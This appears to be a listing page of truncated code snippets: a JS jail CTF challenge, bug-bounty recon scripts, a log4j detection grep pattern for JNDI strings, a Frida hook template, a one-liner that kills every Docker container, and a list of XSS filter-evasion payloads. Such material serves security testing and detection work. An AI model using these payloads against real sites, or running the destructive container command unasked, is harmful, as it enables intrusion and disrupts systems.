Simple JS Jail challenge.
It is run on context, so we have nothing but to play with constructor
and console
.
1337 === eval(our_input)
#!/bin/bash | |
# Initiate new BBRF programs from your public and private HackerOne programs | |
h1name="<your-hackerone-username>" | |
apitoken="<your-hackerone-api-token>" | |
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
while [ "$next" ]; do |
#! /usr/bin/env python3 | |
''' | |
Needs Requests (pip3 install requests) | |
Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt |
_ _ | |
_______ _ __ ___ | | ___ | | | |
|_ / _ \ '__/ _ \ | |/ _ \| | | |
/ / __/ | | (_) || | (_) | | | |
/___\___|_| \___(_)_|\___/|_| | |
https://zero.lol | |
zero days 4 days | |
ATTENTION: |
import requests | |
import re | |
import sys | |
from multiprocessing.dummy import Pool | |
def robots(host): | |
r = requests.get( | |
'https://web.archive.org/cdx/search/cdx\ | |
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
// Android native hooks By @709924470 | |
// CC-BY-NC 4.0 | |
var moduleName = "libmain.so"; // Module name gose here | |
var hookFunctions = [ | |
{ | |
name: "Java_com_example_hellojni_getstr", // Function name goes here | |
onEnter: function(args){ | |
// TODO: your code here | |
}, | |
onLeave: function(ret){ |
References:
<script\x20type="text/javascript">javascript:alert(1);</script> | |
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
<script\x09type="text/javascript">javascript:alert(1);</script> | |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |
'`"><\x3Cscript>javascript:alert(1)</script> | |
'`"><\x00script>javascript:alert(1)</script> | |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |